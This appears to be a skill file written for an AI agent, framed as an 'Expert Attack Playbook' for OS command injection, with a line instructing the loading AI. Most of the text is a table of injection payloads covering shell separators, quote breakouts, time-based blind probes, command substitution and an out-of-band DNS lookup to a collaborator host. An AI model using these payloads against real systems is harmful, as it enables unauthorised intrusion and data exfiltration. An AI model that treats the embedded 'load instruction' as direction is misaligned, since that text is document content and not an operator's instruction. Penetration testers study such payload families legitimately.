cmdi-command-injection

SKILL.md

SKILL: OS Command Injection — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert command injection techniques. Covers all shell metacharacters, blind injection, time-based detection, OOB exfiltration, polyglot payloads, and real-world code patterns. Base models miss subtle injection through unexpected input vectors.

0. RELATED ROUTING

Before going deep, you can first load:

upload insecure files when the shell sink is part of a broader upload, import, or conversion workflow

First-pass payload families

Context
Start With
Backup

generic shell separator
;id
&&id

quoted argument
";id;"
';id;'

blind timing
;sleep 5
& timeout /T 5 /NOBREAK

command substitution
$(id)
`id`

out-of-band DNS
;nslookup token.collab
Windows nslookup variant